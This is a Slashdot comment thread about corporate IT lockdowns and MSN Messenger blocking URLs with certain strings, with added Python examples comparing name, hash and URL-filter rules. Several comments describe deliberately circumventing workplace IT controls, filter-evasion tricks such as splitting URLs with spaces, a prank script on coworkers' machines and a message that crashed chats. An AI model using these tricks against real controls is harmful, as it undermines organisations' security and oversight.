      My favorite useless app we have is a small red E on a shield in the system tray. You double click it and it opens an intranet page along the lines of

      WHAT DO YOU NEED TO DO
      -Evacuate the building
      -Report a fire or police emergency
      -I received a suspicious package
      etc

      --
      ...and that's all there is to it.
    10. Re:Blocked firefox.exe by Dragonslicer · · Score: 1

      There are reasons to block it, and anything else the user wants to install on their own.

      Except they apparently didn't block a user from installing Firefox, but only prevent a program named firefox.exe from running.
    11. Re:Blocked firefox.exe by Anonymous Coward · · Score: 0

      if you come up with a valid business need for said non standard software

      I need to make sure, to the best of my ability, that my computer remains as secure as possible. Can I download Firefox now, boss?
    12. Re:Blocked firefox.exe by Anonymous Coward · · Score: 0

      Part of IT's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then that's too bad. The PC is there for work, not as a toy for you. You have your personal toys at home.

      You seem to have a bizarre belief that any divergence from Central Planning's control is due to a desire to inappropriately use work machines as toys. In reality, people can get a lot more work done with Firefox and google.com than with Internet Explorer and the company intranet landing page. As strange as it may seem, people use the Internet - even the world wide web - to get information to do their jobs.

    13. Re:Blocked firefox.exe by nurb432 · · Score: 2, Insightful

      That's not a business case. That's just a lame excuse.

      And in a well run shop, even if you got permission to run it, the IT department would have to install it for you. You wouldn't be downloading it yourself.

      Once you grow up and have to support 40000 users, you might understand that things are different in the business world than they are at home.

      --
      ---- Booth was a patriot ----
    14. Re:Blocked firefox.exe by Anonymous Coward · · Score: 0

      Right, because fixing Joe Blow's with reactive anti-spyware and anti-virus software is so much better than actually using software that prevents such problems in the first place.

    15. Re:Blocked firefox.exe by AuMatar · · Score: 1

      Support costs? If the user knows enough to be able to download Firefox, he knows enough to support it himself (and really, the "support costs" of a freaking browser are zero anyway). So there are no support costs.

      --
      I still have more fans than freaks. WTF is wrong with you people?
    16. Re:Blocked firefox.exe by mindstrm · · Score: 1

      I get it.. you are one of THOSE users, who thinks he knows more than we do about how computers work, and how corporate IT should be run.

      You do realize that 99% of the time, these stupid policies and bizarre decisions are NOT ours to make in the first place? We get it, man.. we aren't some morons who don't know how to use computers. Odds are we know better than you... and we hate the policies that are in place MORE than you do for the same reason.

      We don't go to management and tell them we don't want anyone to have minesweeper or solitaire... frankly we don't give a shit. Some higher up executive, though, decided to bring it up at a high level management meeting and upper management decided IT had to spend their time locking down stupid default video games rather than doing real work. That meeting spawned more meetings about security.. and eventually the entire corporate PC policy was designed by committee.

      Feel free to blame IT though; we're used to it.

      As for the backup policy... we agree with you completely.. but unfortunately the insane mob that represents the majority of users and management felt their workstations should have full backup, and management made that a priority. Now that the budget has been blown on ridiculous amounts of backup hardware, you see, we can't afford to grow the file servers. So please, cooperate with us, and just keep all your stuff on your PC.

    17. Re:Blocked firefox.exe by Geekbot · · Score: 1

      True. IT doesn't make money, it saves money. With limited sources the IT depts have to decide how to get the most done and get the most satisfaction out of limited resources that won't completely satisfy anyone. Add to that the insane and expensive projects demanded by those who are paid enough to know better, or, at least to rely on people that know better, and you end up with a herculean task that anyone in IT who is competent should be getting a medal. But, the bigger the company is, the more important that it have standardized interfaces and support. This is less efficient for everybody, but still probably saves a ton of money by moderately inconveniencing people instead of facing major internal threats.

    18. Re:Blocked firefox.exe by 3vi1 · · Score: 1

      It helps prevent users default pages getting hijacked with porn sites, among other things.


      A decent firewall and web proxy would be about 100x more practical. Changing the home page as a policy is just doing something irritating for the sake of doing it.

      The original poster overthought the way around it too. All he actually needed to do was create a shortcut to google and use that to launch the browser instead of playing with registry permissions.

      -J
    19. Re:Blocked firefox.exe by Lehk228 · · Score: 2, Funny

      with two clicks you could evacuate the building? sweet next time a co-irker leaves his/her machine unlocked while they use the bathroom have a bit of fun

      --
      Snowden and Manning are heroes.
    20. Re:Blocked firefox.exe by br14n420 · · Score: 1

      This got me modded a troll the last time I said it, but I changed jobs over disliking microsoft products and began working for a company with BSD, Linux, OSX as the primary choices. The only Windows box is run under vmware ESX, and is only used for applications we just have to run Windows for on occasion.

      Prior to changing jobs, I bitched and moaned non-stop about the insanity of every shop I had worked in since 2000, as they had all been forced into using primarily Windows on desktops and servers to emulate the steps the top earners in the field were doing. You can't blame them, really, because if they go against the grain, so to speak, and adopt a minority view of how big business is run, go through with it on the investor's dime, and fail, their ass is on the line, their entire future as a VP, Pres, Director, etc will forever be changed.

      The guy sitting in the cube bashing his keyboard in over an IE crash tends not to thing of it this way, though it is often the reality and there's nothing a low-level is going to do to change it, aside from getting promoted up and then seeing if he has the gumption to risk his future on something that may, or may not, be the best fit for the IT as a whole.

    21. Re:Blocked firefox.exe by Anonymous Coward · · Score: 0

      Seriously... since your company seems to go against your ability to do your job, how about you go out and find a new one?

    22. Re:Blocked firefox.exe by Uruz+7 · · Score: 1

      Wow man, that's friggin' horrid. I hope you take home a nice chunk of change to put up with that.

      I've only worked for progressive internet companies so I haven't witnessed these types of horrors but it pisses me off when people think you will be more productive when they structure everything (your desktop, schedule, dress code, etc). While I don't think people should have porn on their work PC, come in late, or dress like a hobo, I do feel you should be able to make things as comfortable as they can be within reason.

    23. Re:Blocked firefox.exe by Rakishi · · Score: 1

      Connected backup is used where I work but users get to set when things get backed up and what things get backed up. You can also cancel backups but after a couple weeks you will get an email telling you to do a damn backup.

    24. Re:Blocked firefox.exe by Rakishi · · Score: 1

      come in late

      Why should it matter when someone comes in as long as they get work done (which may include meetings, etc.)?
    25. Re:Blocked firefox.exe by Anonymous Coward · · Score: 0

      Pushing down the default page via GPO sounds pretty responsible to me. It helps prevent users' default pages getting hijacked with porn sites, among other things.

      What does that even mean, hijacked? Does IE let random sites change your default page?

      Part of IT's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then that's too bad. The PC is there for work, not as a toy for you. You have your personal toys at home.

      If you think changing my homepage to Google is treating the computer like a toy then you have some SERIOUS control issues. I'll bet you count the number of squares of toilet paper your employees use too.
    26. Re:Blocked firefox.exe by Anonymous Coward · · Score: 0

      Mod parent up!

      It's a VERY valid point, any admin blocking FireFox is an idiot.

    27. Re:Blocked firefox.exe by innocent_white_lamb · · Score: 2, Insightful

      and really, the "support costs" of a freaking browser are zero anyway
       
      "Hello, helpdesk? Website X isn't working. What? It's working for you? Then there is something wrong with this computer. I want to file a help ticket now."
       
      We're probably up over twenty dollars already and haven't even sent someone out to look at this guy's computer yet.

      --
      If you're a zombie and you know it, bite your friend!
    28. Re:Blocked firefox.exe by Kalriath · · Score: 1

      In properly configured corporate environments, the users don't have the required permissions for spyware and most viruses to work either. The vast majority of viruses and spyware rely on moronic users running as an administrator.

      --
      For a site about things like basic rights, Slashdot users sure do like to censor "dissent".
    29. Re:Blocked firefox.exe by Kjella · · Score: 1

      What if it steps on what I need to do my job?

      Then you tell them it impacts your job, and if they don't listen then you do your job blindfolded with one hand tied behind your back if you have to. As long as it's equal for your coworkers it won't negatively impact your performance rating. I hear what you're saying about them sometimes deciding things they don't need to, or just plain old being stupid but if you try telling the business it's not their business how work is performed, you're wrong.

      Pushing the default start page and wallpaper is very common, it's usually about a) branding, b) it's not your computer, it's our computer and c) you might at least want to catch the headlines of what's happening on the intranet. Besides it might have avoided a quite funny incident I experienced where someone had to log in with someone else's account, his homepage was hardcore porn (probably set by some IE hack), if it'd been the states it'd be a free hostile work environment lawsuit. I've heard a few appreciate it if they can customize it, but never complain because they can't, really.

      That said, the other things you mention lead me to believe your IT admins are idiots though I know I'm only hearing one side. But I still think they're in full right to manage the desktop the way they think most effectively serves the business. And if they're not doing their job, well that's a different thing than them doing what's not their job.

      --
      Live today, because you never know what tomorrow brings
    30. Re:Blocked firefox.exe by Anonymous Coward · · Score: 0

      It's stories like yours that I like to print out and hang up to remind me why I work as a freelancer from home now.

      The closest I could come to that from my Cubicle Hell days was a middle manager who suddenly one day developed a pathological obsession with keeping every computer background in the department set to the same plain color. It had to be EXACTLY #28E6FF or he'd have a fit. After getting chewed out for setting mine to a neutral gray once, my revenge was to write a script on random machines which slowly set the background color a single shade different, so that it would cycle through the palette in the course of about a year or two.

      It didn't take long. I actually drove him to take a Polaroid photo of his own screen, cut a circle out of it, and drag a higher manager around by the tie all over the department with his color chip going, "Look! Look! This one's A SLIGHTLY DIFFERENT TINT!!!"

      To a manager, no problem is too small.

    31. Re:Blocked firefox.exe by TheNetAvenger · · Score: 1

      1) Don't they own the computers at your work?

      2) What happens when you get malware from a Firefox exploit? (Lately it has been more on the hit list than IE)

      3) Why would you jeopardize your employment just to run Firefox, as it would violate user guidelines and THEIR security policies?

    32. Re:Blocked firefox.exe by Anonymous Coward · · Score: 0

      The guy sitting in the cube bashing his keyboard in over an IE crash tends not to thing of it this way

      The next time I see Think confused with Thing, I swear I'm going to !$!@#^$!@#^&!@#@!%^#!@&$U^!#%@$
    33. Re:Blocked firefox.exe by AuMatar · · Score: 1

      Bullshit. I have never, ever known someone to call helpdesk over a website not working. Hell, for that matter I've yet to work for a company with a helpdesk.

      --
      I still have more fans than freaks. WTF is wrong with you people?
    34. Re:Blocked firefox.exe by innocent_white_lamb · · Score: 2, Insightful

      I have never, ever known someone to call helpdesk over a website not working
       
      explains
       
        Hell, for that matter I've yet to work for a company with a helpdesk.
       
      As it's impossible to call a non-existent helpdesk.
       
      So your opinion is, therefore,
       
        Bullshit
       
      as you are unqualified to express one in this situation.
       
      Sorry, no cigar this time. Nice try, though.

      --
      If you're a zombie and you know it, bite your friend!
    35. Re:Blocked firefox.exe by KingSkippus · · Score: 4, Interesting

      Odds are we know better than you...

      Maybe, but I kind of doubt it. I was an NT server support person for a couple of years, then a systems admin (and a damned good one, if I do say so myself) for almost a decade. I've fought my fair share of battles, and my background is precisely why I know how to get around most of the shit they keep trying to push down to my workstation.

      Some higher up executive, though, decided to bring it up... (blah blah blah)

      Did you try to fight it? Did you tell your manager, "This is a bad idea, and here's why..."? Like I've said, I've fought my fair share of battles. I haven't won them all. I had to delete Solitaire and Minesweeper at a smaller company I worked at because, as my boss said, "I hate those stupid timewasters." However, when he had a meeting to tell us that he read that you could lock down the desktop background image, I explained to him why that was a bad idea, and actually won that battle.

      At my last job before the one I have now, I was the manager of server operations. I hate to say it, but my boss was a complete idiot who didn't know a thing about managing an IT department. It was ridiculous, and on more than one occasion, I found myself in the CFO's office (his boss) explaining why what my boss had told him was a load of hooey. I ended up quitting because I literally was afraid that I would be prosecuted at some point for something my boss would make me do and pinned on me as a scapegoat, and a few months later, he was finally fired because he screwed up a license scheme and it cost the company over $100 thousand (a LOT of money for that company). While I was there, I actually deliberately disobeyed him on many occasions when he asked me to do things that were illegal and/or unethical.

      But the desktop goobers where I am now? They don't just implement management's decisions. Believe me, I've talked to them on many occasions, and they actually defend what they've done. I know for a fact that they are the ones who are instigating a lot of this crap, because in my company, it's how you get ahead; you lead a project that costs hundreds of thousands of dollars and put together reports about how well it went. What? There isn't a project involving spending hundreds of thousands of dollars? Then you make one up.

      So yeah, I guess I am one of those users. As a matter of fact, I do know more than most of our IT folks about how these systems work. And if they stand in the way of me doing my job, I'll go around them without an iota of guilt because frankly, what I'm doing is much more important than them locking down my home page and desktop background.

    36. Re:Blocked firefox.exe by Thomas+Shaddack · · Score: 1

      You seem to be forgetting that the employees are people too. If you step on their personal wants beyond what's somewhat reasonable, you can't expect much loyalty. People are not slave labor anymore. They are not owned by the employers, even if the employers may be tempted to think otherwise. If you want an obedient workforce with no wants of their own, go to Japan and buy yourself some robots.

    37. Re:Blocked firefox.exe by syousef · · Score: 1

      I'd be looking for work elsewhere if I was getting that stressed.

      It's a balancing act of course though. Every place you work at, every change of management above you all the way to head honcho. Each time you'll get some things getting better and others getting worse. If they're all getting worse you look elsewhere.

      --
      These posts express my own personal views, not those of my employer
    38. Re:Blocked firefox.exe by rohrb123 · · Score: 2, Insightful

      I understand where you're coming from and won't attempt to defend your IT department's actions - completely. Poorly designed network, server, and backup schemes like that are inexcusable. It's quite obvious they're making problems worse instead of fixing them, and creating new ones. It's very simple to have computers turn on with WOL, run a virus scan at night, and turn back off with remote shutdown, and totally unnecessary for any background scans to be running during the day. And lack of storage space is probably the lamest excuse any IT department can come up with these days, with 1TB SATA drives under $400. We maintain 225GB of shared storage PER USER, and the costs were rather small, even for fibre channel.

      However, I've found IT is sometimes used to take care of problems that are really the domain of management or HR, and in this case you generally have to focus on the lowest common denominator. Say you have an employee who's really, really good at what he does, and has gone above and beyond tasked duties a number of times for the company. His skill set alone makes him difficult to replace, especially at what he's currently being paid. However, he has the bad habit of coming in at 6AM and downloading porn on company computers, because he has a wife and kids at home. How did we find out? The startup page being changed to a porn site, as well as several minor adware installations. "Um I don't know how this happened!!" This was when we instituted several new technology policies, including a content-filter as well as a GPO-set home page. Fortunately our startup page only contains links to the most-used work related sites, and google. But it still pissed off people who wanted to catch the news headlines every time they opened their browser.

      I've had similar issues with webmail, screensavers, backgrounds, partypoker, ebay, solitaire and similar programs, the list goes on. It's sad that many people can't get it through their heads that when they're at work they're being paid to work, not work when it's convenient for them. It's also sad that these problems have to be solved via technology instead of management addressing them directly. I've found that to be the origin of many IT "control" policies in my brief experience, and they only tend to make problems worse. You have a secretary in a cubicle who spends half an hour a day (paid) on myspace, and instead of her receiving some sort of formal reprimand, you're instructed to block myspace at the proxy server. She then wastes an hour per day - half of it trying to get around the filter with various proxies, the other half taking care of her social business. Management's response? "well, we'll lose more productivity firing her and training someone else than keeping her on", like there's no middle ground.

      To me it seems like your company is attempting a piss-poor attempt at increasing productivity by decreasing the opportunities for distraction. They're probably the type who think their way of doing things is the most efficient and forcing that upon everyone else is a good thing (such as those custom folders brought up). I've been on the other side of that coin when an employee was having issues with yahoo directions, when we had a copy of mappoint 2k7 as well as google earth on their computer. It's tricky business, and sometimes it's difficult to foresee when you might step on a user's toes, especially the rare advanced user.

      As for the rest of the stuff your IT department does, such as video sharing, well, erm, see article on using linux at work?

    39. Re:Blocked firefox.exe by Charles+W+Griswold · · Score: 1

      Every day, my computer runs [. . .] Notes database replication [. . .]

      They make you use Lotus Notes? Those bastards.
      --
      "Those who are too smart to engage in politics are punished by being governed by those who are dumber" -- Plato
    40. Re:Blocked firefox.exe by Charles+W+Griswold · · Score: 1

      Pushing down the default page via GPO sounds pretty responsible to me. It helps prevent users' default pages getting hijacked with porn sites, among other things.

      What does that even mean, hijacked? Does IE let random sites change your default page?

      Oddly enough, yes.
      --
      "Those who are too smart to engage in politics are punished by being governed by those who are dumber" -- Plato
    41. Re:Blocked firefox.exe by Eivind · · Score: 1

      Unlikely to be large costs though, the kind of user who knows enough to care which particular web-browser he uses is also very likely to be clueful enough to, on the rare occasions when something doesn't work right because it's ie-code not standard html, fire up ie.

      And when the costs are low, the "business reason" doesn't need to be a very vital one. Indeed, I'd expect in most cases "It is my preferred tool" should be sufficient. Worker satisfaction is also a factor. Workers are commonly unsatisfied at finding their everyday worklife filled with arbitrary restrictions and detail-control from on high.

    42. Re:Blocked firefox.exe by Ilgaz · · Score: 1

      The working model of Firefox and IE are completely different on modern, widely used "Run application inside Webbrowser" kind of things.

      What if company uses an intranet page for adding critical database records and because Firefox works in a different way, it breaks things? What if 1000 users install Firefox in a single day? Can you imagine the offline time and the cost?

    43. Re:Blocked firefox.exe by Nintendork · · Score: 1

      Apparently, they don't know how to administer their Windows network. Code can be permitted or blocked using an MD5 or SHA1 hash. See this article. Also, to those that complain about stupid IT decisions, I say this: Yes there are a lot of stupid IT decisions, but given the right network, security can be a top priority. I work at a credit card processing company. Keeping control over what code can be run, then maintaining those programs with patches and forced settings helps tremendously in keeping the network safe. An ex-girlfriend works at Lockheed Martin on special projects. She doesn't get an internet connection. She's not permitted to carry in a cell phone. Now a small shop that has absolutely zero hack factor doing these kinds of things is ridiculous. As long as they're protected from drive-by vuln scans, have an AV solution, and keep malware under control, that's almost always enough. Dreaded power users that find all sorts of fun ways to fuck their computer can be kept under control at a management level.
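How a file-name rule and a hash rule behave when a binary is renamed or altered, as an added example that is not part of any comment in this thread. The file contents are constructed stand-ins for real executables, the function names are hypothetical, and the policy check is a plain-Python model rather than the Windows policy engine. SHA-1 is used only because the comment above names it; the logic is the same with SHA-256.

```python
import hashlib
import os
import shutil
import tempfile


def sha1_of(path: str) -> str:
    """Hash the file contents in chunks; the file name plays no part."""
    digest = hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def name_rule_allows(path: str, denied_names: set) -> bool:
    """Deny by file name only, the rule described earlier in the thread."""
    return os.path.basename(path).lower() not in denied_names


def hash_deny_allows(path: str, denied_hashes: set) -> bool:
    """Deny specific content: survives a rename, not a content change."""
    return sha1_of(path) not in denied_hashes


def hash_allowlist_allows(path: str, allowed_hashes: set) -> bool:
    """Permit only known content: anything unlisted is refused."""
    return sha1_of(path) in allowed_hashes


def demo() -> dict:
    """Build constructed files in a temp dir and evaluate each rule."""
    with tempfile.TemporaryDirectory() as root:
        unapproved = os.path.join(root, "firefox.exe")
        with open(unapproved, "wb") as fh:
            fh.write(b"constructed stand-in for an unapproved browser binary")

        approved = os.path.join(root, "approved_tool.exe")
        with open(approved, "wb") as fh:
            fh.write(b"constructed stand-in for an IT-approved binary")

        # Same bytes under a different name.
        os.mkdir(os.path.join(root, "copy"))
        renamed = os.path.join(root, "copy", "iexplore.exe")
        shutil.copyfile(unapproved, renamed)

        # Same program with one byte appended, so the content hash changes.
        altered = os.path.join(root, "copy", "altered.exe")
        with open(unapproved, "rb") as src, open(altered, "wb") as dst:
            dst.write(src.read() + b"\x00")

        denied_names = {"firefox.exe"}
        denied_hashes = {sha1_of(unapproved)}
        allowed_hashes = {sha1_of(approved)}

        return {
            "name_rule_stops_original": not name_rule_allows(unapproved, denied_names),
            "name_rule_stops_renamed": not name_rule_allows(renamed, denied_names),
            "hash_deny_stops_renamed": not hash_deny_allows(renamed, denied_hashes),
            "hash_deny_stops_altered": not hash_deny_allows(altered, denied_hashes),
            "allowlist_stops_altered": not hash_allowlist_allows(altered, allowed_hashes),
            "allowlist_permits_approved": hash_allowlist_allows(approved, allowed_hashes),
        }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

A hash deny rule pins one exact build, so it has to be refreshed for every new version; the allowlist form is the one that fails closed on content it has never seen.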

    44. Re:Blocked firefox.exe by soliptic · · Score: 1

      Call me crazy, but couldn't you... um... leave?

      Your place just sounds idiotic to me. I don't think I [c|w]ould tolerate it.

      I come in at about 10, wearing whatever I want, fire up Firefox, cruise around the (unfiltered) internet for a bit, ooh, I need to do some vector graphics today, I'll install Inkscape and see what that's like...

      Sure, the pay isn't all that great compared to Big Corporates-ville (which is what I'm guessing your place is), but it's worth it to me to work in a place populated by sane people doing things because it helps the overall aim of the organisation, not insane people doing insane things for the sake of it.

    45. Re:Blocked firefox.exe by Anonymous Coward · · Score: 0

      I feel for you King Skippus. I'm on an IT staff and from the sound of it, you have a really piss poor IT department. Any IT staff that can't really manage their departments without having these dumb restrictive policies suggest that they are not on the ball in regards to desktop support. I can only suspect that your IT staff is full of paper MSCE's with no real experience at computing. Overly restrictive policies are usually a sign of an utter lack of skill on the management side of things, and this is certainly not restricted to technology industries or departments.

      As a sysadmin, my job is to make my clients' work easier, not harder. My only gripe with the people I support now is that they don't always tell us immediately when something doesn't work. A good sysadmin will find ways to solve problems so that employees don't have to hack around things as you have. There really is no need for certain restrictions that you've encountered.

      The corporate video idea seems ludicrous. Sucking up bandwidth just to have video seems to limit overall productivity. What happened to having a dedicated server with proper bandwidth. As for the Connected Backup software, I suspect it's caused by that crap Sarbanes-Oxley(sp?) law that requires all corporations to back up everything, including employee's workstations. I probably would just run a script, on both unix and on Windows (yes it can be done) to collect everything off hours. Any modern computer can be set to wake on lan or automatically start at certain hours. Even systems 7 years old have this ability (If your company runs anything older than 5 years old for a desktop you should look for a new place of work. It's a whole other story if these are special dedicated systems.).

      Connected Backup probably allows them to say they've obeyed Sarbanes-Oxley. As for the other so-called IT staff who responded against you. Seems like they're just griping because they don't have "control" over you.

      FWIW, I've been on both sides of the fence. I've programmed and I've sysadmined, so I understand what users and sysadmins are like. I wanted to do hardware ages ago, but the jobs weren't there when I graduated, so I got a job programming first; there was a slump that one year. Later, the sysadmin quit, and in lieu of hiring a new one they handed it over to me, since I already knew how to do the work. There are quite a number of intelligent people as well as utter dunces in both camps.

      Unfortunately, encounters with the dunces happen far more frequently. The intelligent ones usually don't ask for or need any help or cause any problems. On the other hand, I also worked as a systems integrator/installer and those companies that I got sent to had utterly clueless so-called sys-admins. I installed our servers and had to help them integrate their Windows, Mac and unix systems together. Then again, that's probably why our company was hired to do the work in the first place. I wonder what the ratio really is.

      P.S. As for that blocking of firefox, what utter retards of sys-admins. They should just maintain a new updated copy and push it out along with IE patches. It's not that difficult. I would easily figure out my way around it as you have. I wonder if they blocked Opera too. I personally would prefer to remove IE, but I don't. It's not my job to deny the choice. It's my job to make sure the systems work.

    46. Re:Blocked firefox.exe by ACMENEWSLLC · · Score: 1

      They are getting sneakier. We have a very tightly locked down set of public user machines. We use Microsoft's software to do this. It's worked well for years. But what we are seeing is that these applications will install into the %temp% directory or the desktop. They will use HKCU if they need to store things in the registry. They are installing into areas that users typically have full control over.

      We've locked down the users' HKCU and personal directories on these machines, as well as limit access to processes iexplorer.exe and a few others. But the fact is they are getting more creative.

  6. experience by Anonymous Coward · · Score: 0

    definitely they do this.

    I remember I was trying to send the link to OldApps.com to a friend via MSN IM, and it just wouldn't deliver it.

    AC: Here's the link:::
    AC: http://www.oldapps.com/
    friend: ??
    AC: did you got it?
    AC: http://www.oldapps.com/
    AC: http://www.oldapps.com/
    friend: dude? wtf?
    AC: God damn it... I'm sending it!
    AC: http://www.oldapps.com/
    friend: ur a n00b

    So I tried downloading the file myself, then sending it (file transfer) to him... and he just wouldn't receive the file transfer window/request.

    Stupid MS.

    1. Re:experience by Anonymous Coward · · Score: 0

      Does www.oldversion.com work?

      Different site, similar content.

    2. Re:experience by someone1234 · · Score: 1

      Next time try this: ht tp://www. oldapps. com/ And tell your friend to omit spaces.

      --
      Patents Drive Free Software as Hurricanes Drive Construction Industry
  7. I already knew some by alx5000 · · Score: 4, Interesting

    Since the day I became almost crazy when I was trying to pass a URL which included 'download.php?' to a friend from a well trusted website. All of my messages sent back to me. PITA.

    Fortunately, it's kinda easily fooled if you randomly place a space and add "delete the space" at the end of the sentence. If they trust me in the first place, what prevents them from copy-pasting it and deleting a character as I requested?

    --
    My 0.02 cents
    1. Re:I already knew some by Jeff+DeMaagd · · Score: 1

      It's not even a matter of trust, some people will follow instructions without asking why they are doing this. So your trick could be used to spam people and you'll get a lot of people that will do what you ask. It's even easier if you can tell people that the link goes somewhere that they might want to go, like cheap software, porn, cheap medicine, etc.

    2. Re:I already knew some by mattpointblank · · Score: 1

      Yeah. My friend was trying to link me to someone's Facebook profile and we both got frustrated as he insisted he'd sent me the link and I could not see it. We had to resort to email. And the girl wasn't even that hot.

  8. the list by Anonymous Coward · · Score: 0
    • .info
    • profile.php? (including ?)
    • download.php? (including ?)
    • gallery.php
    • pics.php
    • ListAllTopics.php
    • .scr
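
What raw substring matching over that list does, next to matching on the parsed and percent-decoded URL, as an added example that is not MSN's code or anything posted in the thread. The sample messages are constructed, the rule encoding and function names are hypothetical, and case-sensitive substring matching is an assumption about how the server-side filter behaves.

```python
import re
from urllib.parse import unquote, urlsplit

# Strings from the list posted in this thread.
BLOCKED_STRINGS = [".info", "profile.php?", "download.php?", "gallery.php",
                   "pics.php", "ListAllTopics.php", ".scr"]

# The same list expressed as rules on URL components
# (hypothetical encoding, chosen for this example).
RULES = [
    ("tld", "info"),
    ("file_with_query", "profile.php"),
    ("file_with_query", "download.php"),
    ("file", "gallery.php"),
    ("file", "pics.php"),
    ("file", "listalltopics.php"),
    ("extension", ".scr"),
]

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Constructed sample messages.
SAMPLES = [
    "http://evil.example.com/download.php?id=1",
    "http://evil.example.com/down%6Coad.php?id=1",
    "http://www.information.example/help",
    "http://example.info/",
    "ht tp://example. info/ (delete the spaces)",
]


def naive_match(message):
    """Substring test on the raw message text."""
    return [s for s in BLOCKED_STRINGS if s in message]


def structured_match(message):
    """Match rules against host and decoded path of each URL in the message."""
    hits = []
    for url in URL_RE.findall(message):
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower()
        except ValueError:
            continue  # not parseable as a URL; nothing to match on
        # One round of percent-decoding, as a web server applies to the path.
        path = unquote(parts.path).lower()
        basename = path.rsplit("/", 1)[-1]
        has_query = "?" in url
        for kind, value in RULES:
            if kind == "tld":
                matched = host.endswith("." + value)
            elif kind == "file":
                matched = basename == value
            elif kind == "file_with_query":
                matched = basename == value and has_query
            else:  # "extension"
                matched = basename.endswith(value)
            if matched:
                hits.append((url, value))
    return hits


def compare(samples=SAMPLES):
    """Return (message, naive hits, structured hits) for each sample."""
    return [(m, naive_match(m), structured_match(m)) for m in samples]


if __name__ == "__main__":
    for message, naive, structured in compare():
        print(f"{message!r}\n  naive:      {naive}\n  structured: {structured}")
```

Decoding and parsing removes the encoding gap and the `www.information.example` false positive, but the last sample shows the limit of any string filter: a link the recipient reassembles by hand never appears as a URL on the wire.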
  9. Reminds me... by free+space · · Score: 1

    Some time in 2002, if I remember, I wanted to make my MSN Messenger nickname a Microsoft related joke, only to find the client preventing me with a message that says:

    "A part of your nickname contains trademarked words and thus cannot be used".

    I changed "Microsoft" to "Micro Soft" but it just wasn't the same :(

  10. I've run into this issue before by deftcoder · · Score: 1

    I had tried to send my friend a link to a website like site.com/staff.php, and gaim said "blah blah received an error from the MSN switchboard".

    Another thing to note: you used to be able to crash people out of chats by typing "[.pif]" (without quotes). It would cause everyone to exit the conversation with a "connection error". Now, it just kicks you out.

    --
    Peace sells, but who's buying?
    1. Re:I've run into this issue before by Anonymous Coward · · Score: 0

      Another thing to note: you used to be able to crash people out of chats by typing "[.pif]" (without quotes). It would cause everyone to exit the conversation with a "connection error". Now, it just kicks you out.

      In Soviet Russia... oh, never mind.

    2. Re:I've run into this issue before by SanityInAnarchy · · Score: 1

      Yeah, on my Kopete, on the sending end, it lags for maybe 20 seconds (though maybe that's because I'm downloading something, but I suspect it's deliberate), then says "connection closed" and warns me that the message wasn't sent correctly.

      On the receiving end, it just tells me that I closed the chat window.

      --
      Don't thank God, thank a doctor!
  11. Misleading headline by noidentity · · Score: 3, Insightful

    This isn't censorship; it's just a poor firewall. The difference is that the former is for stifling human communication, while the latter is to protect machines from malicious software.

    1. Re:Misleading headline by jamie · · Score: 3, Informative

      No, the data which is being blocked from transmission is not blocked because it's going to a computer program which would be exploited by it. At least I haven't seen any allegations of that. It's being blocked because the human that would receive the data might use it in a way deemed inappropriate (by clicking on it, say).

    2. Re:Misleading headline by jez9999 · · Score: 4, Informative

      Are you the guy that Slashdot hired to start correcting all the inaccurate stories and comments posted here?

    3. Re:Misleading headline by GalionTheElf · · Score: 1

      Completely OT but what is that little /. icon I can see next to the friend/foe marker? Is that a new thing or am I just spectacularly dense? Also, what is it for? Surely if I'm reading the comments here I know how to find the front page? ;)

      TIA if you find the time to answer these burning questions. Inquiring minds need to know!

      --
      I'm going over here and I don't know why!
    4. Re:Misleading headline by TheRaven64 · · Score: 1, Informative

      It means he is a member of the Slashdot staff. You don't see them very often because only half a dozen or so people have them, and judging by the dupes not many of those actually read the site.

      --
      I am TheRaven on Soylent News
    5. Re:Misleading headline by Anonymous Coward · · Score: 1, Informative

      Thanks. Makes sense I guess, must be like the nerdiest badge of honour evar.

    6. Re:Misleading headline by jZnat · · Score: 1

      Don't forget the little eye icon that means they're a part of the OSTG staff. Roblimo is the only one I've seen with that icon, but there could be others.

      --
      'Yes, firefox is indeed greater than women. Can women block pops up for you? No. Can Firefox show you naked women? Yes.'
    7. Re:Misleading headline by Anonymous Coward · · Score: 0

      Which is why they should turn the fucking link parsing off! Drives me insane. Try selecting (to copy) just a portion of a link you receive on MSN, and see what I mean.

    8. Re:Misleading headline by Emperor+Cezar · · Score: 1

      I agree that this isn't "censoring", it's stupid, it's a lazy way to protect against virii, but it's not censorship. To call it such weakens the definition and power of the word censorship and makes it look like the community is being knee-jerk and unreasonable, weakening any argument.

    9. Re:Misleading headline by pimpimpim · · Score: 1

      since when is clicking on a link deemed inappropriate? Isn't that what links are for?

      --
      molmod.com - computing tips from a molecular modeling
    10. Re:Misleading headline by jamie · · Score: 1

      You must be new here :)

    11. Re:Misleading headline by Anonymous Coward · · Score: 0

      You can add a space in the url or just say "add php on the end" in the message.

      It would have been better to just disable those urls as clickable in MSN, rather than have people spend time wondering wtf is going on with the MSN connection.

  12. Forgot to say... by free+space · · Score: 1

    For those who don't have MSN: They changed their mind and it can be done now.

    1. Re:Forgot to say... by Anonymous Coward · · Score: 0

      >For those who don't have MSN: They changed their mind and it can be done now.
      Gosh, thanks for the update - I know that I couldn't have slept tonight not knowing that.

  13. Fix "automatically run code based on text message" by Anonymous Coward · · Score: 0, Insightful

    That might be a good start - don't automatically do whatever some random dolt at the other end of a few TCP connection hops implies you should. Running code just because it was sent to you in a link is downright fucking stupid, yet M$ does it automatically.

    Then, fix the rampant security holes in the entire OS that allow someone running as a random user to totally hose the entire OS installation. In other words - get where Unix was, oh, about twenty or thirty years ago.

    The fact that M$ has disabled their own apps and OS from doing what they coded it to do is proof that their entire approach to developing software results in insecure products. Time and time again, we see that's true. This is just another example. Why do you "hate" someone who is merely pointing that out?

  14. Priorities and mitigation by Fastolfe · · Score: 3, Insightful

    Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

